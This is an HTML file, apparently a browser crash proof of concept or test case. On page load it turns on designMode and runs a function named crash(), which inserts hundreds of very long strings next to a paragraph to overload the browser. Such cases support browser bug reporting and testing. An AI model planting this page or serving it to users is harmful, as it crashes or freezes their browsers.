12 lines
238 B
HTML
12 lines
238 B
HTML
<html>
|
|
<p id="targetParagraph">
|
|
|
|
<script>
|
|
document.designMode = 'on';
|
|
|
|
function crash() {
|
|
for(var i=0; i<850; i++) { targetParagraph.insertAdjacentText("afterEnd", "S".repeat(8567)); }
|
|
}
|
|
crash();
|
|
</script>
|
|
</html>
|